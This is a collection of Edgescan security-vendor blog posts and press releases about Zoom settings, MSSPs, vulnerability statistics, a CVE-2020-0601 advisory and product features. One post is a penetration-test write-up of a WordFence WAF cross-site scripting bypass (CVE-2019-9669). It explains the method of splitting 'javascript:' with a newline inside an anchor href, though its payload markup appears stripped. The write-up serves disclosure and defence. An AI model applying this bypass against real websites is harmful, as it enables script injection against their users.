third-parties. However, if a third-party host has this function enabled, then this function is available for all meeting participants (your organisation and third-party).   Screenshare + Remote Controlling I would recommend reviewing the use of this function and disabling if not required. By default, 'Remote Control' feature is not disabled and locked by administrators. Enabling Remote Control function for your organisation's participants or host users increases the risk of your members permitting third-parties to potentially take remote control over an internal host system and possibly accessing unintended information or your organisation's network resources. It should be noted that an end-user must still grant permission to allow remote controlling of their system.   In summary Most importantly, testing or using third-party software unethically is illegal and authorisation should be sought prior to any activity. EternalBlue targeted thousands of Windows systems and more than 200K organisations suffered as a result of EternalBlue vulnerability but no one abandoned Windows systems and still use it. Whatsapp also suffered from some serious vulnerabilities but we still use them. As long as Zoom is taking actions on all security concerns and tries to resolve issues as soon as possible, that’s the main thing.   Zoom free version comes with limited administrative access and might not give you full control over security controls and settings. If you choose to use a free licence you accept that it will not have the full range of features as the paid version.  If you want those features, pay for them. ### What makes a great Managed Security Service Provider (MSSP)? Organisations are rapidly looking at the support of a managed security service provider (MSSP) as an alternative to investing heavily in recruitment, staffing costs and finding a solution to the problem of staff retention. In fact, they see taking on an MSSP as an extension to their existing IT team, which can offer further cyber security expertise to maintain the company’s security posture, assume accuracy and improve effectiveness. With an increasingly challenging threat landscape, being a successful MSSP can be a struggle. Making sure customers stay safe is critical to the success of your business, which is why understanding what makes a great MSSP is crucial for you to be able to make informed choices that will prove beneficial to the company. Employ and maintain the right staff If you’re going to advertise the fact that you are experts in cyber security, then you need to make sure you employ staff who know what they are doing. In too many cases, security operations centres (SoCs) employ staff with minimal or little experience in building, deploying and managing a system in a production environment. The reliance on tools alone is also a problem, as an SoC is only as good as the tooling and staff combined. The majority of SoC operations staff are not equipped with the skills an experienced consultant or determined attacker has in their armory. The retention ratio for MSSP staff is also problematic, as salaries for SoC staff are on the lower end of the cyber security pay scale. This is a big issue, as the SoC is at the forefront of an organisation’s defence, and the staff are faced with actors of malicious intent on a daily basis. Your SoC and security teams are the first and last lines of defence against some pretty determined threat agents out in the wild, so make sure they feel valued. As we all know, there is a substantial cyber security skills gap, so if you have talented and experienced staff, keep them happy with benefits and incentives, and this will lead to contented customers.   Relaying accurate data Making sure you’re able to offer more accurate results is key to helping your customers’ IT teams work in a more time-effective and efficient manner. Make sure you can give a truthful false positive rate alongside the various types of data you can offer. Being a MSSP is an outcome-driven service, so always deploy the best dashboards and application programming interfaces (APIs) available to clearly share the information you’re receiving and help easily identify potential threats. There have been too many incidents where vulnerabilities have been classed as false negatives due to the SoC team not understanding the issue correctly. “Your SoC and security teams are the first and last lines of defence against some pretty determined threat agents out in the wild – make sure they feel valued” Ryan Compagnone, Edgescan Integration and output Understand how each customer’s reporting system works. Have the solutions in place to easily integrate clean, actionable data into their reporting processes, be it SDL pipeline or ticketing. Remember, you’re there to make things more efficient without missing any critical incidents, so offer a reporting system that will integrate with ease but will highlight any security issues without fail. Measurement of success Offer detailed reports on the breach attempts thwarted, malicious activity detected and vulnerabilities discovered. Measuring your success and relaying it back to the customer is the best way to demonstrate your value and maintain the trust in you. It is also a tool to which you can help your customers improve their security posture and offer additional services if needed. Partnering with other security experts To stay ahead of the volatile threat landscape and maintain a proactive approach to your customers’ security needs means partnering with other security providers. It is now near impossible to offer all the tools needed to combat modern cyber security threats. As an MSSP, this is an opportunity you can capitalise on. Partnering with different security vendors which offer different solutions can help you grow your business, deliver a better service and generate high-value, increased recurring revenue business partnerships. You’ll also be able to take advantage of a wealth of knowledge and support to deliver better business outcomes for your business and your customers. As an MSSP, you’ll be facing ever-increasing demand for security services, plus the need to rapidly deploy solutions as new threats occur. To be a great MSSP, you’ll need to demonstrate the ability to deliver a full portfolio of security services more competently and cost-effectively than your customers can do on their own. If you can deliver the above, then you will make a great MSSP, but also remember you can’t deliver a full security service on your own. Make sure you work with the right people to guarantee business success. ### EDGESCAN AND RICHEY MAY JOIN FORCES   EDGESCAN AND RICHEY MAY PARTNER TO SUPPORT NORTH AMERICA’S FINANCIAL SERVICE AND REAL ESTATE INDUSTRIES   Edgescan today announces its partnership with Richey May Technology Solutions that will see it continue the company’s channel expansion into the North American market. The partnership supports Edgescan’s growth within the financial services and real estate industries.   As an accounting and advisory firm, the partnership will allow Richey May Technology Solutions to offer Edgescan’s Software-as-a-Service (SaaS) platform to its clients that delivers highly scalable, accurate and fullstack vulnerability management and intelligence.   Edgescan fullstack vulnerability management offers financial and real estate companies the assurance and confidence to automate highly accurate vulnerability data flows into key systems within the organisation, across both the network and application stack. Its API and integration capabilities, with an array of systems from SIEM, GRC, ticketing, instant alerting and messaging, provides clients with enterprise visibility when and where they need it.   “Every week we see breaches occurring in organisations that are compliant in highly regulated industries. Financial services and real estate are two of those industries, comments Eoin Keary, CEO of Edgescan. “Our solutions keep organisations fully compliant with continuous and comprehensive monitoring to detect vulnerability risk. Working closely with Richey May, we can help increase the security posture of their clients and continue its good name as a trusted partner.”   John-Thomas Gaietto, Executive Director of Cybersecurity Solutions at Richey May, said; “We’re dedicated to offering our clients the expert tools needed to keep themselves secure above and beyond compliance regulations. Edgescan’s offering does just that. It gives our clients the assurance and confidence to automate highly accurate vulnerability data so they can detect and deal with potential threats immediately. We look forward to working closely and growing our client base with Edgescan.”   --END--   About Edgescan Edgescan offers a Vulnerability Management Security as a Service (SaaS) solution. The edgescan™ SaaS security solution manages thousands of assets across the globe for both enterprise and SME clients helping them to continuously detect, prioritise, monitor and fix security weaknesses for Internet-facing systems, such as web applications, websites, mobile apps, servers, firewalls, VPN’s or VoIP services. Due to analyst validation of all discovered vulnerabilities, the solution is highly accurate and virtually false positive free.     About Richey May Founded in 1985, Richey May provides assurance, tax, technology and business advisory services to clients in the United States. Based in Denver, Colorado, the firm specialises in the financial services, mortgage banking, alternative investment, and real estate industries, and offers a wide range of tailored solutions to meet the needs of privately-held companies and their owners. For more information, visit www.richeymay.com.     ### Edgescan COVID19 Response   The Irish government has taken the unprecedented step of closing all schools, universities, public gatherings and childcare facilities, in response to the evolving Covid-19 pandemic. They have also asked that businesses adopt remote working practices where possible.   Here at Edgescan, we already operate with a highly mobile workforce and can fully function with our entire staff working remote. We have a robust BC/DR plan and it is business as usual at Edgescan, we are fully operational and expect to remain so under the current restrictions and any planned escalation. We have also offered assistance to national agencies to assist in the fight against Covid-19.   Remote Working We have seamlessly rolled our remote working policy for the protection of our team and clients. Our team have the necessary equipment, can access our network and can remotely communicate with clients and each other in order to carry out their roles. Meetings Our offices are closed and due to current public health guidelines we are not travelling to client offices for meetings or consultancy. All operations are now carried out remotely and have been reorganised by the key personnel. Can we help? We want to help you and your organisation through this crisis.  Please reach out if you need help or advice on how to maintain your security posture.  Many of our clients have had to send staff home and may be exposed. As an MSSP we can help fill the gaps.   Two Biggest issues for our clients - we can help. 1. Increased endpoints due to remote working - Edgescan will assess any live endpoint within any CIDR range under management, at no extra cost. 2. Offsite Testing - Edgescan can handle internal testing through a jumpbox – our largest banking client is now being secured using this approach.   Take Care We have been overwhelmed with the support and goodwill of our clients and team during this pandemic.  We would urge you to take care of yourselves, your families and our community. We are all in this together and we will come out the other side.  We want to reassure you that with Edgescan, you are in safe hands. If you have any queries or concerns, please utilise all of the normal communication channels or Contact Us here.       ### Edgescan’s 2020 Vulnerability Stats Report Released Edgescan’s 2020 Vulnerability Stats Report also reveals the time to patch vulnerabilities for an internet-facing system is now 71 days   Dublin, IRELAND – 18th February 2020 – Edgescan, the ‘fullstack’ Vulnerability Management Security as a Service (SaaS) solution provider, today releases its fifth Vulnerability Stats Report looking at the state of fullstack security in 2019, based on tens of thousands global assessments. The report has revealed that, in 2019, it took organisations an average of 50.55 days (nearly eight weeks) to remediate critical risk vulnerabilities for public internet-facing web applications and 49.26 days for internet-facing network layer critical risk vulnerabilities.   The report also found that high or critical risk vulnerabilities in external facing web applications had significantly increased from 19.2 per cent in 2018 to 34.78 per cent in 2019. High or critical risk vulnerabilities discovered in externally facing network layer systems had also more than doubled in 2019, going up to 4.79 per cent from just 2 per cent the previous year.   “2019 saw more than 8 billion records breached, with some of the biggest breaches being experienced by Capital One, Quest Diagnostics, Houzz and Zynga. Many of these breaches were caused by web application layer vulnerabilities that could have been preventable with if appropriate secure development and visibility practices were adhered to,” comments Eoin Keary, CEO of Edgescan. “Although the time-to-remediate critical risk vulnerabilities for public internet facing web applications has reduced by just over 18 days since 2018, we are still seeing high rates of known and patchable vulnerabilities which have working exploits in the wild. This could be due to the fact it is hard to patch production systems. Web application security is where the majority of risk still resides, and this is an area that organisations, no matter what size, should be taking notice of.”   Further key findings from the report:   A 20-year-old vulnerability was discovered still ‘in the wild’ in over 3500 systems across Europe and North America. Originally discovered in 1999, the CVE-1999-0517 vulnerability has CVSS high severity risk score of 7.5 (out of 10) and the potential to cause a serious data breach. The most common CVE vulnerability in 2019 was first discovered in 2016, over four years ago. The CVE-2016-2183, has a high severity risk score of 7.5 (out of 10) and makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session. On average, 67.8 per cent of assets had at least one CVE with a CVSS (v3.x) value of 4.0 or more, making the non-compliant with PCI regulations.   Contact media@edgescan.com edgescan.com ### Edgescan and Aon Deliver Global Fullstack Vulnerability Management Edgescan Powers Aon's CyberScan Solution Edgescan, the Fullstack Vulnerability Management Security as a Service (SaaS) solution provider, today announces it is working with leading global professional services firm Aon, to support the cybersecurity posture of global clients.It enables Aon to leverage Edgescan's Software-as-a-Service (SaaS) platform, branded as CyberScan to provide clients with a highly scalable, accurate and fullstack vulnerability management and intelligence. The automated platform will also identify and rank unknown vulnerabilities in real-time. "In this highly-connected digital age, the speed at which the cyber landscape changes, working with Aon will enable us to combine our expertise and reach to improve the cybersecurity posture of Aon clients as well as continually looking at new ways of developing innovative solutions to strengthen our cyber defences," said Eoin Keary, Edgescan's founder and CEO. "Aon is dedicated to delivering innovative solutions to help clients manage their cyber risk," comments Justin Clarke-Salt, Managing Director, Aon's Cyber Security. "Our CyberScan product will help clients identify, track, and remediate security vulnerabilities that, if unchecked, could lead to incidents that could cause significant financial and reputational damage." About Edgescan Edgescan offers a Vulnerability Management Security as a Service (SaaS) solution. The edgescan™ SaaS security solution manages thousands of assets across the globe for both enterprise and SME clients helping them to continuously detect, prioritise, monitor and fix security weaknesses for Internet-facing systems, such as web applications, websites, mobile apps, servers, firewalls, VPN's or VoIP services. Due to analyst validation of all discovered vulnerabilities, the solution is highly accurate and virtually false positive free. About Aon plc Aon plc (NYSE:AON) is a leading global professional services firm providing a broad range of risk, retirement and health solutions. With over 50,000 colleagues in 120 countries they empower results for clients by using proprietary data and analytics to deliver insights that reduce volatility and improve performance. Contact media@edgescan.com ### CVE-2020-0601 Security Advice from Edgescan Windows CVE-2020-0601? This blog explains CVE-2020-0601, how to identify if you are vulnerable and what, if anything, you need to do.   What is it? A man-in-the-middle/spoofing vulnerability exists in Windows 10, Windows Server 2016/2019 – when an authenticated attacker is on the target system, they can use a spoofed code-signing certificate to sign malicious executables making the file appear as if it’s from a trusted source. This vulnerability is post-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could conduct man-in-the-middle attacks and decrypt encrypted traffic such as traffic sent over the encrypted protocol of HTTPS. To exploit this vulnerability, an attacker would need to be authenticated to the device.   Should I be worried?  You may be vulnerable if you have unpatched Windows machines running Windows 10 or Windows Server 2016/2019.   What do I need to do? Currently, there is no safe PoC for testing assets. Once a PoC is developed or available in the wild, Edgescan clients will be notified as soon as possible, if they are vulnerable.  You should also check your patching as per for Windows 10 or Windows Server 2016/2019: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601   Here for CVE advisory: https://nvd.nist.gov/vuln/detail/CVE-2020-0601   Here for the NSA advisory: https://media.defense.gov/2020/Jan/14/2002234275/-1/-1/0/CSA-WINDOWS-10-CRYPT-LIB-20190114.PDF   If you have any concerns please reach out to the Edgescan Team.   Take this opportunity to download the edgescan 2019 Vulnerability Stats Report.   ### Continuous Asset Profiling   Something we are pretty proud of at Edgescan is our Continuous Asset Profiling service which is part of any Edgescan license. We call it HIDE (Host Index, Discovery & Enumeration).   So what is it and why should I care? HIDE provides continuous asset profiling across blocks of our clients IP’s. So rather than asking a client to specify individual IP’s, Edgescan profiles entire IP blocks/ranges. But why do this? The reason we give our clients the ability to profile entire blocks is three-fold. HIDE can detect if a server/IP goes live since the last round of continuous profiling. HIDE can detect if a new service/port or firewall change has occurred on any asset profiled. HIDE can alert our client of any change to their external asset profile on an ongoing basis using various methods such as SMS, email or outgoing webhook.   If, as per traditional approaches to profiling, we only assess named endpoints we don’t get the full picture.   HIDE eliminates network blindspots. HIDE is very good at identifying many blindspot use cases including: The dev team deploy a server for testing without knowledge of security. A rogue exfiltration point is established similar to an APT A rogue service is deployed to exfiltrate data   Detection is performed in Edgescan via profile DELTA ANALYSIS on a continuous basis so we detect change in near-realtime. Via the portal Edgescan users can query HIDE information across thousands of servers in seconds. This can be done by using our filtering API on the console. So if a user needs to query all systems with say “Ports 80/443 open running Linux” across thousands of servers this can be done in seconds and downloaded into CSV, XLSX etc.   Clients with large estates (10,000’s of IP’s/Servers) find this a very useful feature of Edgescan Obviously our Edgescan API can be used to query this information also without using the GUI. Alerting is also configurable such that DevOps staff can be alerted when defined incidents take place.   HIDE gives Edgescan clients the ability to monitor and profile systems and alert them of any changes to their estate profile in minutes.   Have you used HIDE?  Tell us what you think.   Please get in touch through the Edgescan Contact form for more information. ### Three Weeks to Vulnerability Management Maturity   As unbelievable as it sounds, that's all it takes to drastically improve your organisation's security posture when using Edgescan.  Watch the video below to see how the experts at Edgescan lead you through three main steps in only three weeks.   Week 1 - Edgescan Onboarding Onboarding of your assets including web apps, APIs, IPs, CIDR ranges and cloud are all onboarded into Edgescan and organised in the way you want. Alerting, events and continuous profiling are all enabled so you instantly start to receive situational intelligence and visibility. Vulnerability assessment commences and you can see what's happening through the Edgescan dashboard. You're up and running already.   Week 2 - Edgescan Vulnerability Assessmemt Vulnerability assessment has started and weaknesses and risks are being identified. All issues are validated by our experts so there are no false positives and your organisation is supported by the Edgescan team. Continuous asset profiling is providing you with complete visibility. Events are being alerted to your team based on what matters to you. You have full control.   Week 3 - Edgescan API Integration Integration of Edgescan cloud API to your internal ticketing systems. Edgescan delivers tickets and alerts based on security intelligence which matters to you. Vulnerabilities are being reported and your team is fixing them based on priority. You are requesting retests on demand to verify fixes by simply pressing a button. You are generating WAF rules automatically where required to virtually patch discovered issues.   Congratulations! You are now well on the way to fullstack vulnerability management maturity in only 3 weeks with Edgescan.   So what are you waiting for?  Contact us now and our experts will have you up and running in no time. Don't forget to subscribe to our YouTube Channel to keep up to date with Edgescan. ### Edgescan Launches Attention Index Metric   Innovation never ends at edgescan and we are constantly improving value to our clients and making our products and services as good as they can be.  Edgescan's most recent deployment is the Attention Index metric.  An asset's Attention Index is a value between 0 and 100 that indicates how much attention or 'love' the client gives to that asset. It's an abstract measurement that is calculated from edgescan's vulnerability data.   The attention index is shown in a new widget on the left of the metrics page.  The widget will display the assets with the 10 highest, also known as Most Loved Assets and 10 lowest attention index scores. If there are multiple assets with a perfect or zero score, they will be grouped. There is an excel export function where all assets and scores can be viewed.         The idea is to present a list of the client's assets which are receiving most 'attention', the severity of the vulnerability is not a consideration.  The beauty of the Attention Index is that it gives an instant overview of a large number of assets and the volume of vulnerabilities being resolved.  The 'most loved assets' can be easily accessed by clicking on the link in the index.   The Attention Index data can be exported for use in reports and charts.  The information is recorded over time so that changes in position are highlighted by green (up) or red (down) arrows for clear, at-a-glance information.  To date, the feedback has been hugely positive as those responsible for a large number of assets can easily see how their resources are being utilised.  Ideally, an organisation's most critical assets should also be the most 'loved'.   Have you taken a look at edgescan's new Attention Index?  Tell us what you think.   Please get in touch through the Edgescan Contact form for more information.   Strengthening Your Defense with ASM The Attack Surface Management (ASM) service from Edgescan provides continuous visibility into your digital landscape, helping you proactively secure your attack surface. With our new Attention Index Metric, we enable you to focus on the most critical threats and vulnerabilities. With offices in Dublin and New York, Edgescan delivers real-time insights for smarter security decisions. ### edgescan Wins at Tech Excellence Awards 2019 On Thursday 23rd May, the 19th annual Tech Excellence Awards event was held at Citywest Hotel in Dublin. More than 600 luminaries from the technology sector gathered to celebrate another year of innovation and commercial success at home and abroad. edgescan had been shortlisted for Managed Security Service Provider of the Year along with Integrity360, Novi and Zinopy. This award recognises an outstanding service provider in this market space who can demonstrate both technical acumen and solid business performance. It was one of the last announcements of the night so tensions were running high but the edgescan team did what they could to calm the nerves.  Eventually, it was announced that edgescan would be awarded Managed Security Service Provider of the Year 2019 and Eoin, Rahim and Owen graciously accepted the award on behalf of everyone at edgescan/BCC Risk Advisory. Eoin thanked everyone at edgescan for 'all your hard work in getting this small company to where it is today'. The Tech Excellence Awards is Ireland’s principal badge of honour in the IT industry. This Awards programme recognises excellence not only in implementing tech solutions, but also in the business of marketing and implementing technology for business. Thanks to TechTrade for sponsoring our award and to TechExcellence for putting on such an enjoyable night. ### edgescan is CREST Approved for Penetration Testing BCC Risk Advisory/edgescan recently applied for accreditation to CREST for our Penetration Testing services. CREST is a not-for-profit accreditation and certification body that represents and supports the technical information security industry. CREST provides internationally recognised accreditation for organisations providing technical security services and professional level certifications for individuals providing penetration testing, cyber incident response, threat intelligence and security operations centre (SOC) services. CREST Member companies undergo regular and stringent assessment, whilst CREST certified individuals undertake rigorous examinations to demonstrate the highest levels of knowledge, skill and competence. To ensure currency of knowledge in fast changing technical security environments the certification process is repeated every three years. We are proud to announce that edgescan Penetration Testing service met the high standards set by CREST and achieved accreditation. “We are delighted to welcome edgescan as a new CREST Member company,” said Ian Glover, President of CREST. “To become a CREST Member, companies go through a very demanding assessment process, and through accreditation for its penetration testing services, edgescan is demonstrating its commitment to consistently delivering the highest levels of professional security services. What does this mean? BCC Risk Advisory/edgescan is now the only ISO27001 & CREST Certified Pen Testing Platform available on the market doing what we do. This creates huge benefits for the edgescan™ service within the global market and further bolsters our channel approach to support our partners who may not have access to Pen Testing Resources. This is further evidence of the quality of our services and the hard work and commitment of the edgescan and BCC Risk Advisory team. View this link to see the BCC Risk Advisory/edgescan CREST Approved listing. ### Selecting a Vulnerability Management MSSP Partner Challenges facing MSSP Clients: Many organisations looking for a Managed Security Service Provider (MSSP) do so in order to save on staffing costs, solve the challenges of staff retention, and assume accuracy and effectiveness improvements.  Do you know what you are getting when engaging with a managed security provider? Are they experts in "everything security" or specialist in specific aspects of cyber? Many MSSP's offer complex or vague descriptions of their service offerings in order to try and give the impression they "do it all" ever so well. The reality is just not the case. Many Security Operations Centre (SoC) -as-a-service employ folks with minimal experience or little experience in building, deploying and managing a system in a production environment. The reliance on tools alone is also a problem as a SoC is only as good as the tooling and staff combined. The majority of SoC operations staff are not equipped with the skills an experienced consultant or determined attacker has i their armory. Tools also produce vast amounts of white noise which in effect are false positives and even worse false negatives can occur. The retention ratio for MSSP staff is also problematic as salary's for SoC staff is on the lower end of the cyber security pay-scale. This gives rise to concerns given the SoC is the monitoring and threat detection center for an organisation who in effect face off with actors of malicious intent on a daily basis. Bottom line, your cyber security staff are your last line of defense against some pretty determined threat agents out in the wild. Features to look out for in choosing a MSSP partner Data Quality: Accuracy results in less effort and greater efficiency. Tooling is simply a conduit to view events. Promoting events to incidents takes time and skill. Tuning tools also takes time and skill. What is the False positive Rate for a given solution. Ask what types of data will be the shared, what dashboards or API's are available in order to consume such information. MSSP is an outcome-driven service after all. I've seen vulnerabilities being classed as "False Negatives" due to the SoC team nut understanding the issue correctly and not being able to reproduce the issue. Integration and output: Understand how clean actionable data can be integrated into your organisations systems. Be it SDL pipeline or ticketing system can the MSSP integrate with your systems with ease? Measure Success: How can the MSSP provide metrics which you can use to measure success. Breach attempts thwarted? Malicious activity detected, Vulnerabilities discovered, Vulnerabilities mitigated. Can the data provide insight into measuring what success looks like. We can improve what we can measure. Clear communication to the business on the value of the service, investment in time and budget is key to garnering support for cyber security. MSSP's should be able to help you with this challenge. Evolving with API Security Testing When it comes to securing your API infrastructure, Edgescan’s API Security Testing ensures that your APIs are protected against the latest vulnerabilities. We help you stay ahead of emerging threats with comprehensive security testing. From our offices in Dublin and New York, we provide tailored API security solutions that evolve with your needs. ### Popular Wordpress WAF bypass Zeroday discovered by Edgescan WordFence WAF XSS Bypass – CVE-2019-9669 by Anthony Yalcin A Web Application Firewall (WAF) is an application firewall that filters, monitors, and blocks malicious HTTP traffic. By inspecting HTTP traffic, it can prevent attacks related to web application security flaws, such as SQL injection, cross-site scripting (XSS), and security misconfigurations. WAFs may come in the form of an appliance, server plugin, or filter, and may be customized to an application. WordFence is a WordPress security plugin that includes an endpoint firewall and malware scanner. The WAF attempts to identify and block malicious traffic and additionally perform real-time IP blacklisting from malicious IPs. During a penetration test of a web application built on WordPress we noted that the target application was being protected by the WordFence WAF. We discovered that a URL query string parameter value was being reflected in the immediate response from the application server. The WordFence WAF blocked us while attempting to inject malicious JavaScript into the parameter value. By using a specially crafted payload we were able to bypass the WordFence WAF and inject malicious JavaScript into the web application.   The Discovery The first step performed in finding this vulnerability was to identify a valid injection point by crawling through the site and observing what endpoints reflect user input in the response. After crawling the site, we noted that the query string parameter (q) is reflected in the response. By using injecting basic HTML we can see that there is a lack of input validation or output encoding on this parameter value.   The Analysis Now that we have our injection point, we now need to find a payload that will not trigger the WAF. Performing basic tests for XSS such as injecting triggered the WAF. Examples below show that the WordFence WAF is protecting the application against basic XSS payloads.     The Bypass After trying multiple payloads, it was noted that it was possible to inject an anchor tag including the href attribute. For example: test The WAF was triggered when “javascript” followed by “:” was injected into the href attribute. Below are a few of the attempts made to bypass this WAF ruleset: • test •test • test • test Working Payload: please%20click%20here Payload Breakdown: URL Decoded: please click here HTML Decoded(Note the new line): please click here   Outcome Web-application firewalls may not fully protect your sites from these types of attacks. They do however, slow attackers down. A motivated attacker will spend as much time as they need to exploit these types of vulnerabilities. WAF’s offer many types of protection, such as; protection against known attacks or vulnerabilities based on blacklists. In the case of a new vulnerability is discovered on your site, before a patch can be installed it may be quicker for a ruleset to be added to the WAF to temporarily block this particular payload. It is recommended that all user input be output encoded at any point where it is copied into application responses. The output encoding should depend on the context in which the untrusted input is used. At the server language level, the user input should be converted to the correct data type. For example, if an integer is expected then the user input should be converted to an integer and not stored as a string. Knowledge of how this data is handled by the server language is key, at the time where this input is copied into the application responses it should be output encoded in the correct context such as HTML, URL, JavaScript, and CSS. Not identifying the correct encoding type can lead to vulnerabilities persisting in an application or possibly introducing other vulnerabilities. Using HTML for example all HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). For URLs this should be URL encoded (%3c %3e %22 etc). Additionally, user-controlled input on all pages is subject to rigorous validation routines before it is accepted by the application. Anthony Yalcin is a Senior Information Security Consultant at Edgescan. ### Achieving Secure Defence in Depth - Rahim Jina, COO/Co-Founder Achieving Secure Defence in Depth, a webinar organised by Infosecurity magazine, was an informative session of expert insight into the best practices to achieve a truly comprehensive security standpoint.   The one and only Dan Raywood (shout out to him for featuring among the 100 top influencers at this year’s RSA, according to a list published by Onalytica!) chaired the conversation, and representatives from Oracle and Jardine Software were also present to provide valuable industry knowledge on how to best create and maintain in-depth security. My intervention focussed around the two areas where businesses and organisations should focus in terms of cybersecurity: creation and nurturing.   Creating a secure environment requires building a solid foundation, and this can be achieved by looking at Secure Development Life Cycle (SDLC), Static Application Security Testing (SAST), Dynamic Application Security Testing (DAST) and Toolchain Integration.   A SDLC simply means that security is an integral part of the entire development process and that it isn’t an addition, bolstered on at the end of the process. Designing security into apps and systems is essential not only to reduce subsequent costs of fixing vulnerabilities that could have been prevented at development stage but also to increase the efficiency of security measures which are native to the app itself, rather than an add-on.   Part of the SDLC, SAST, such as source code analysis, gives enterprises the flexibility to perform security tests in all types of SDLC methodologies. Both paid and open source tools are available to perform this kind of tests, DAST, or Runtime testing, is also an integral part of secure development: while SAST analyses the application from the inside, DAST examines the security of an application while it’s running, from the outside.   Toolchain integration takes all these security measures to the next gear and allows to match defences with how you produce code. No single tool can guarantee to cover efficiently the multidiscipline nature of security operations, but nowadays the customers are spoilt for choice of incredibly effective tools to integrate into their security systems, which can be tailored and specific to the business’ needs. Implementing security measures is essential, but it is also important to gauge how effective these are. For this reason, metrics of efficacy should be kept about all the assets, systems and apps – it is of no use to spend on security measures whose efficiency can’t be proven and doesn’t add value to the overall security standpoint.   The nurturing side of things, instead, focuses on the maintenance and protection of these building blocks. In fact, the security of a system inevitably decreases over time, which is why security should be a continuous effort, rather than a one-time investment.   Visibility is one of the most important aspects of nurturing your security standpoint: you can’t protect what you didn’t know was there. Enterprises should have an asset management system which highlights what in their network and infrastructures need protecting and should aim to have a complete picture of the security posture.   Moreover, full-stack Vulnerability Management provides a much more reliable and consistent protection than ad hoc, infrequent tests. Ongoing assessment and risk mapping, and assessment of the risks that each vulnerability poses on application and infrastructure can inform remediation prioritisation and incredibly reduce the risk of a breach.   For more information on the importance of integrated, platform-based approaches to better application security, as well as ways to apply modern strategies to improve your current security posture please visit edgescan.com. This webinar is available to view at www.infosecurity-magazine.com, Rahim's presentation is the first one and runs for about 25 minutes. ### edgescan achieve ISO 27001:2013 Certification We're very happy to announce that Edgescan is now a certified ISO 27001:2013 Vulnerability Management SaaS.  - One of very few Vulnerability Management SaaS organizations globally. Certificate can be found here What does this mean to you? Well, simply we can prove we deliver our Vulnerability management SaaS in accordance with industry best practice.  In effect we operate under a model for establishing, implementing, operating, monitoring, reviewing, maintaining and improving an information security management system within edgescan This helps us assure you that using our SaaS is possibly less risky than engaging with other vendors who are not certified and dont have a defined information Security Management System (ISMS). We take great care in protecting, processing and maintaining vulnerability data and our staff are trained in cyber security best practices from technical development to data classification and privacy. We just thought you would like to know! ### False Positives, False Negatives and Tooling Beware of False prophets: Something we have encountered with our clients when using MSSP's (Managed Security Service Providers) is in relation to tools and validation. Tools are necessary to discover security weaknesses across the fullstack which is nothing new. Fullstack visibility of security controls is key when operating a robust vulnerability management operation but there are some pitfalls..... We've seen false positives being promoted to "real issues" resulting in service tickets being raised and assigned to SoC (Security Operations Centre) operations staff. After some time it is discovered that this issue is not real and the FP is simply a result of the tool not interpreting a result of a test correctly. The negative impact is simply wasting staff time,  from developers to operations staff and all in-between in order to close-off the false alarm. This detracts from the SoC efficiency and time that should be spent on real issues when following a risk based approach to cyber security. Even worse we have seen Real issues being marked as false positives resulting in a false negative. So a real issue is ignored. This is obviously much worse, a cyber security issue has just been closed off and ignored but why?..... A little knowledge is a dangerous thing... We found that in some cases the SoC operations staff simply did not understand the vulnerability or they couldn't reproduce it or validate the issue properly. This is not uncommon due to the fact that the SoC operations staff are not experienced enough to validate complex  or non standard issues   Jack of all trades, master of none: A weakness of a generic SoC is they simply don't have the experienced staff to manage, understand and validate complex vulnerabilities. There is a lack of bespoke tooling for validation also and have reliance on generic security tools. - Protection of an enterprise takes time and experience, there are many areas for automation which reduces the workload but some aspects of cyber security take human intelligence.  Simple "Vanilla" Most SoC operations staff, frankly dont stay for long in that position as it is relatively low paid and provides minimal experience and exposure. Attackers dont generally rely on rooms full of screens, generic out-of-a-box tools and have significant skill.   This is something to consider, food for thought?   ### edgescan continues to expand in revenue, staff and global clients Dublin 06 July 2018. edgescan announced today that their revenue has increased by 60% in the first six months of 2018. "The growth is based on global outreach and delivering something different to solve an age old problem" says COO Rahim Jina. The edgescan staff count has doubled since 2016, now at over 40 staff and are constantly looking for talented development and security experts. "We have strong ties to many of the local technical colleges and universities which helps graduate intake. Our sponsorship of "Zero Days" among'st other events has helped with recruitment also." - said Louise Fitzgerald, Customer Success Manager. edgescan's rapidly developing enterprise footprint in the USA and UK has fueled growth in staff levels, and revenue. Many of the roles to be filled are related to feature development and operational security services. ### Payment Services Directive (PSD2) White Paper ### Eoin & the security, Security as a Service / MSS…..Why? Security as a Service / MSS.....Why? A number of factors are driving the need for managed security services (MSS) which are namely expertise, cost and consistency. Key concerns when considering an MSS should be included as detailed below: Cost: The associated cost benefits of using some MSS providers may appear a very attractive proposition. MSS provides the ability for a company to have deep security expertise without the associated cost of full time employees. For example our edgescan™ service gives our clients access to our security engineering team whom manage the security posture of their assets. A managed service should give you the ability to reduce your Capital Expenditure and control your security-spend without sacrificing quality. Using an MSS, you can maintain your security posture but reduce overall Cost of ownership. Accuracy: Security is about covering all the bases; a defender needs to manage all vulnerabilities, whilst an attacker needs to exploit only one (vulnerability). Accuracy covers two aspects of MSS; Firstly the ability to detect and manage discovered vulnerabilities with confidence Secondly to reduce the time required by the business to patch, fix or configure due to the quality of the vulnerability information delivered via the MSS provider. For example, our clients value the hybrid approach we have to vulnerability management which involves human validation of every discovered vulnerability and results in virtually “false positive free" security intelligence. Your MSS should provide you with accurate, actionable security information. Compliance and continuous management: Threat & Vulnerability management and meeting compliance requirements via a 24/7 security assessment remain the primary drivers for considering an MSS. Your MSS should assist with demonstrating compliance and continuous improvement via management information dashboards and extensible API calls for integration into your technology “stack". MSS can also assist you in reallocating existing resources to other security areas, or the need to engage deeper or broader expertise than is available in-house. Your MSS should address requirements where you don't have in-house expertise. edgescan.com is a managed security service developed, managed and delivered by BCC Risk Advisory. It's a cloud based vulnerability management platform and helps clients discover and manage system vulnerabilities on an ongoing basis. It significantly reduces the cost of ownership while increasing cybersecurity resilience significantly. edgescan provides continuous vulnerability assessment coupled with a customized reporting portal and APIs set to help you understand what vulnerabilities your business faces. edgescan assesses the security of both web/mobile applications and associated servers, or indeed any deployed systems, giving you “full-stack" vulnerability management. www.bccriskadvisory.com ### Competitive analysis & differentiators for the edgescan™ platform. ### edgescan V3.0 Preview edgescan 3.0 is the latest version of the edgescan managed penetration testing service. View this video for a quick run-through the new features of edgescan, including API integration, vulnerability alerting and improved user interface. ### Edgescan Assets The assets page displays clear and simple information about a company’s assets (e.g. IP, website, web application). Users can view both application and network vulnerability scores and a breakdown of the risks faces by the selected 